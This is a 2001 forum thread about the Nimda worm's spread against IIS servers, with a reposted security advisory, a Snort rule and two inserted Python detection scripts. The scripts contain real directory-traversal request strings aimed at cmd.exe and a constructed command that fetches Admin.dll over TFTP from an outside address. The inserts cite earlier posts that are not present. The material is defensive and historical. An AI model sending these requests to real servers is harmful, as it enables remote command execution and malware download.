Stupid thing also dumps files all over the network. It got into our net about two hours ago, and began to spew ".eml" files all over the place, on every machine on the subnet, one in every subdirectory it could find. (Where is the name of some real file on the system.) The contents are a readme.exe file, which is MIME-encoded to say that it's a WAV file. My guess is that, if you click on the .eml file, it launches things anew...

We've been seeing it too (2, Informative)

Chang (2714) | more than 12 years ago | (#2314797)

Snort has been picking this up as IDS297 (directory traversal) and 102:1:1 (IIS Unicode attack) at our location since about 9:00am EDT.

We are seeing very heavy activity (not as bad as Code Red) since then.

New Virus (2, Informative)

Sternn (143817) | more than 12 years ago | (#2314809)

I contacted UUNET (My T1 provider) and they told me it was a strain of Code Red. It seems to be everywhere. I have isolated a few dozen IP's from my logs already. I have contacted the web admins of the sites in question as well. I am getting about 100+ hits a minute now, utilizing about 10%-20% of the T1 the main webserver is on. I'm guessing this will be a problem for everyone, even if you're not running IIS, or your server is patched (like mine), the hundreds of scans can eat your bandwidth away regardless.

-S

Mystery file upon accessing attacking site (1)

jermz (6352) | more than 12 years ago | (#2314811)

When trying to access a couple of the attacking sites, I get a download of a file called wbk832.tmp and a second IE window opens with the URL of mhtml:http://xxx.xxx.xxx.xxx/readme.eml

This looks like a bad one. Anyone have any ideas?

From ntbugtraq... (0)

Anonymous Coward | more than 12 years ago | (#2314812)

There have been numerous reports of IIS attacks being generated by
machines over a broad range of IP addresses. These "infected"
machines are using a wide variety of attacks which attempt to exploit
already known and patched vulnerabilities against IIS.

It appears that the attacks can come both from email and from the
network.

A new worm, being called w32.nimda.amm, is being sent around. The
attachment is called README.EXE and comes as a MIME-type of
"audio/x-wav" together with some html parts. There appears to be no
text in this message when it is displayed by Outlook when in
Auto-Preview mode (always a good indication there's something not
quite right with an email.)

The network attacks against IIS boxes are a wide variety of attacks.
Amongst them appear to be several attacks that assume the machine is
compromised by Code Red II (looking for ROOT.EXE in the /scripts and
/msadc directory, as well as an attempt to use the /c and /d virtual
roots to get to CMD.EXE). Further, it attempts to exploit numerous
other known IIS vulnerabilities.

One thing to note is the attempt to execute TFTP.EXE to download a
file called ADMIN.DLL from (presumably) some previously compromised
box.

Anyone who discovers a compromised machine (a machine with ADMIN.DLL
in the /scripts directory), please forward me a copy of that .dll
ASAP.

Also, look for TFTP traffic (UDP69). As a safeguard, consider doing
the following;

edit %systemroot%\system32\drivers\etc\services.

change the line;

tftp 69/udp

to;

tftp 0/udp

thereby disabling the TFTP client. W2K has TFTP.EXE protected by
Windows File Protection so can't be removed.

More information as it arises.

Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

Aargh! (1)

JimPooley (150814) | more than 12 years ago | (#2314817)

Just started getting these in the last two hours, all from 195.x.x.x addresses.
OK. So I'm running Apache, which shrugs them off, but they're wasting our crap bandwidth and stuffing our web server logs!
I tried looking at the websites - many of them had some kind of default screen, indicating an unused IIS installed by default/mistake.

Apache commands (2, Informative)

man_ls (248470) | more than 12 years ago | (#2314823)

apache_1adminconfig
fontsmrtns2
apacheroutedelete
hpfontsmod_perl-1
gettime
big-sister-0
apachejmeter_1
pdfwritr
apache-contrib1lo66293
routedelete
autoexec
apachejmeter_1mod_phantomimap

No ideas...got me what it's doing.

I've been getting these, as well as SirCam messages, the "Hi! How are you? I send you this file to ask for you advice..." with ATT0000059.TXT, a 59-byte file, and ATT0000059.DAT, 159KB that looks like it contains some type of executable code.

I've also gotten the snippets of the registry:
"ware\Microsoft\Windo,b4 pull123"

Anyone have any ideas about this? I haven't opened anything except the messages, and Windows 2000 is pretty secure, but I'd rather not get infected with something if possible.

Figured that's what it was. (2)

Perianwyr Stormcrow (157913) | more than 12 years ago | (#2314831)

Aside from the Code Red usual suspects who've been hitting my server, I've seen a shitload of these, too.

It doesn't even have a cool name yet. feh.

Maybe a Box collection for mass DDoS on Afghanistan? (0, Flamebait)

Quazion (237706) | more than 12 years ago | (#2314832)

I heard some Hacker groups were planning cyberwar against Afghanistan and Iraq, then they will be needing loads of machines.

Don't know but this could be related.

Quazion.

eh? (2)

Perianwyr Stormcrow (157913) | more than 12 years ago | (#2314852)

Declaring "cyberwar" on Afghanistan is a lot like threatening to blow up Kabul's world trade center.

Oh, they don't have one? Exactly.

I'd imagine most "cyberwar" would focus on Pakistan, but they're helping us already.

Info From Russ at BugTraq (5, Interesting)

Anonymous Coward | more than 12 years ago | (#2314833)

-----BEGIN PGP SIGNED MESSAGE-----

There have been numerous reports of IIS attacks being generated by machines over a broad range of IP addresses. These "infected" machines are using a wide variety of attacks which attempt to exploit already known and patched vulnerabilities against IIS.

It appears that the attacks can come both from email and from the network.

A new worm, being called w32.nimda.amm, is being sent around. The attachment is called README.EXE and comes as a MIME-type of "audio/x-wav" together with some html parts. There appears to be no text in this message when it is displayed by Outlook when in Auto-Preview mode (always a good indication there's something not quite right with an email.)

The network attacks against IIS boxes are a wide variety of attacks. Amongst them appear to be several attacks that assume the machine is compromised by Code Red II (looking for ROOT.EXE in the /scripts and /msadc directory, as well as an attempt to use the /c and /d virtual roots to get to CMD.EXE). Further, it attempts to exploit numerous other known IIS vulnerabilities.

One thing to note is the attempt to execute TFTP.EXE to download a file called ADMIN.DLL from (presumably) some previously compromised box.

Anyone who discovers a compromised machine (a machine with ADMIN.DLL in the /scripts directory), please forward me a copy of that .dll ASAP.

Also, look for TFTP traffic (UDP69). As a safeguard, consider doing the following;

edit %systemroot%\system32\drivers\etc\services.

change the line;

tftp 69/udp

to;

tftp 0/udp

thereby disabling the TFTP client. W2K has TFTP.EXE protected by Windows File Protection so can't be removed.

More information as it arises.

Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.2

iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVMM DU ChVqn6yReQXqEH
Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVYJ Uu pDHB1Yy1DY/po6
iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQja mK I2eqd4TdE0yfIO
hSW7yN2lhJc=
=YAwc
-----END PGP SIGNATURE-----
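
The mail side of this is a MIME part whose declared type and filename disagree: the header fragment quoted earlier (`Content-Type: audio/x-wav; name="readme.exe"`), the `.eml` files jducoeur saw dropped on shares, and the README.EXE attachment Russ describes are all the same trick. The following is an added example (not code from the thread or from any of the posters) that walks a message with Python's standard `email` module and flags any attachment whose extension, declared Content-Type and actual leading bytes do not agree. The sample message is constructed from the quoted headers; its base64 bodies are stubs (an MZ executable header and a RIFF/WAVE header), not the worm.

```python
import email
from email import policy

# Constructed message modelled on the header fragment quoted in the thread:
# an audio/x-wav part whose name is readme.exe, plus a real-looking .wav for
# contrast. The base64 bodies are header stubs, not the worm.
SAMPLE_EML = """\
From: sender@example.invalid
To: victim@example.invalid
Subject: readme
MIME-Version: 1.0
Content-Type: multipart/related; boundary="====_ABC1234567890DEF_===="

--====_ABC1234567890DEF_====
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

<html><body></body></html>

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
 name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <readme>

TVqQAAMAAAAEAAAA

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
 name="hello.wav"
Content-Transfer-Encoding: base64

UklGRiQAAABXQVZF

--====_ABC1234567890DEF_====--
"""

# Extensions Windows runs on open regardless of the declared Content-Type.
EXECUTABLE_EXTENSIONS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs", ".js"}

# Magic bytes a part claiming one of these types should start with.
EXPECTED_MAGIC = {"audio/x-wav": b"RIFF", "audio/wav": b"RIFF"}


def suspicious_parts(raw_message):
    """Return [(filename, declared_type, [reasons])] for attachments whose name,
    declared type and actual bytes do not agree."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        name = part.get_filename()  # Content-Disposition filename= or Content-Type name=
        if not name:
            continue
        declared = part.get_content_type()
        ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
        payload = part.get_payload(decode=True) or b""
        reasons = []
        if ext in EXECUTABLE_EXTENSIONS and not declared.startswith("application/"):
            reasons.append(f"executable extension {ext} declared as {declared}")
        if payload[:2] == b"MZ":
            reasons.append("payload begins with an MZ executable header")
        magic = EXPECTED_MAGIC.get(declared)
        if magic and not payload.startswith(magic):
            reasons.append(f"{declared} payload lacks {magic.decode()} header")
        if reasons:
            findings.append((name, declared, reasons))
    return findings


if __name__ == "__main__":
    for name, declared, reasons in suspicious_parts(SAMPLE_EML):
        print(f"{name} ({declared}):")
        for reason in reasons:
            print("  -", reason)
```

The check on the decoded bytes matters more than the header comparison: the point of labelling the part `audio/x-wav` is precisely that a client trusts the declared type, so a filter should look at what the bytes are rather than at what the sender says they are.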

From what department? (0, Troll)

EI-AOB (227589) | more than 12 years ago | (#2314842)

from the what-a-pain-in-the-arse dept.

Arse? When did you move to England (or Ireland), Rob?

Damn it! (4, Interesting)

Reality Master 101 (179095) | more than 12 years ago | (#2314848)

Just when I was hoping my cable company would unblock my HTTP port (which they said was "temporary"). Unfortunately, this will give them more fuel to make it permanent.

The HTTP port doesn't bug me as much as they have also blocked my mail port.

Question for sendmail experts out there, related to this: I'm currently using another system to tunnel my mail to my box on my cable modem. It works great, but a side effect is that it looks like all mail is coming from "localhost", which defeats the anti-Spam measures. Of course, it didn't take long for the cockroaches to find my mail server and use it for relaying. I've been fighting it by blocking specific subnets, but it's an annoying battle. Any suggestions?

Snort rule (3, Informative)

AftanGustur (7715) | more than 12 years ago | (#2314851)


Add this to your in-house SnortRules file.

alert TCP $EXTERNAL_NET any -> $HOME_NET 80 (msg:"AfterRed Worm"; flags: A+; content: "/cmd.exe"; nocase;)
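
To see why a plain `content: "/cmd.exe"; nocase;` match catches the requests quoted in the story even though their traversal bytes differ, and what it misses, here is an added example (mine, not the poster's rule or the worm's code) that decodes request targets the lenient way the vulnerable IIS decoder did and tags them with the attack families from Russ's ntbugtraq post. Two percent-decoding passes turn `%255c` and `%%35%63` into a backslash; folding the never-valid two-byte sequences led by `%c0`/`%c1` on their low bits turns `%c1%1c` into one as well. The first three sample targets are the ones quoted in the story; the `root.exe`, drive virtual root and `tftp ... Admin.dll` ones are constructed to match the ntbugtraq description, and the address 10.9.8.7 is made up.

```python
import re

HEX_DIGITS = b"0123456789abcdefABCDEF"


def percent_decode_once(data):
    """One %XX decoding pass; malformed escapes are kept literally, so
    '%%35%63' -> '%5c' after this pass and '\\' only after a second pass,
    and '%255c' -> '%5c' -> '\\' likewise."""
    out, i = bytearray(), 0
    while i < len(data):
        if (data[i] == 0x25 and i + 2 < len(data)
                and data[i + 1] in HEX_DIGITS and data[i + 2] in HEX_DIGITS):
            out.append(int(data[i + 1:i + 3], 16))
            i += 3
        else:
            out.append(data[i])
            i += 1
    return bytes(out)


def fold_overlong_utf8(data):
    """Collapse two-byte sequences led by 0xC0/0xC1 (never valid UTF-8) using only
    the low bits of each byte, as the vulnerable IIS decoder did: %c1%1c and the
    textbook overlong %c1%9c both become 0x5c, a backslash."""
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(((data[i] & 0x01) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(data[i])
            i += 1
    return bytes(out)


def canonicalise(target):
    """Return (canonical path, escaped_webroot) for a raw request target."""
    path = target.split("?", 1)[0].encode("latin-1")
    decoded = fold_overlong_utf8(percent_decode_once(percent_decode_once(path)))
    parts, escaped = [], False
    for seg in decoded.decode("latin-1").replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts:
                parts.pop()
            else:
                escaped = True  # climbed above the virtual root
            continue
        parts.append(seg.lower())
    return "/" + "/".join(parts), escaped


def classify(target):
    """Tag a request with the attack families described in the thread."""
    canonical, escaped = canonicalise(target)
    query = target.split("?", 1)[1].lower() if "?" in target else ""
    base = canonical.rsplit("/", 1)[-1]
    tags = []
    if re.search(r"%c[01]%[0-9a-f]{2}", target, re.I):
        tags.append("overlong-utf8")
    if "%25" in target.lower() or "%%" in target:
        tags.append("double-decode")
    if escaped and base == "cmd.exe":
        tags.append("traversal-to-cmd.exe")
    if base == "root.exe":
        tags.append("codered2-root.exe")
    if base == "cmd.exe" and re.match(r"/[cd]/", canonical):
        tags.append("codered2-drive-vroot")
    if "tftp" in query and "admin.dll" in query:
        tags.append("tftp-admin.dll")
    return {"canonical": canonical, "tags": tags}


def snort_rule_matches(target):
    """The posted rule's only test: the payload contains '/cmd.exe', any case."""
    return "/cmd.exe" in target.lower()


# First three: quoted in the story. The rest are constructed from the ntbugtraq
# description (root.exe, drive virtual roots, tftp fetch of Admin.dll) plus one
# benign request. 10.9.8.7 is a made-up address.
SAMPLE_TARGETS = [
    "/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir",
    "/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir",
    "/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/root.exe?/c+dir",
    "/c/winnt/system32/cmd.exe?/c+dir",
    "/scripts/root.exe?/c+tftp+-i+10.9.8.7+GET+Admin.dll",
    "/index.html",
]


def report(targets=SAMPLE_TARGETS):
    return [(t, classify(t)["tags"], snort_rule_matches(t)) for t in targets]


if __name__ == "__main__":
    for target, tags, hit in report():
        print(f"{'snort' if hit else '     '}  {','.join(tags) or '-':45} {target}")
```

The literal `/cmd.exe` survives every encoding trick because the worm only obfuscates the traversal, not the filename, so the rule fires on all three quoted requests. It stays silent on the `root.exe` requests aimed at boxes already backdoored by Code Red II, including the one that fetches Admin.dll over TFTP; a second rule on `root.exe`, or an egress watch for UDP 69 as Russ suggests, covers that half.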

They're very _active_ aren't they... (2, Informative)

FreeMars (20478) | more than 12 years ago | (#2314854)

Those machines must have a lot of probe threads running -- I got hit by a site at 8:47 and again at 10:25. (Or else the random number generator in the worm is bad.)

My DSL to home is completely swamped ... I can't even get a ping through.

Apache too? (1)

DarkWarriorSS (518859) | more than 12 years ago | (#2314857)

I noticed the same thing in my web log this morning. I think it not only affects IIS, but I think it will also affect Apache servers running Micro$oft FP Extensions, as the /scripts/ and stuff it's pointing to are all a part of the extensions. It does also try to exec. some windoze only files. But personally, it's gonna be bigger than we all think it will be...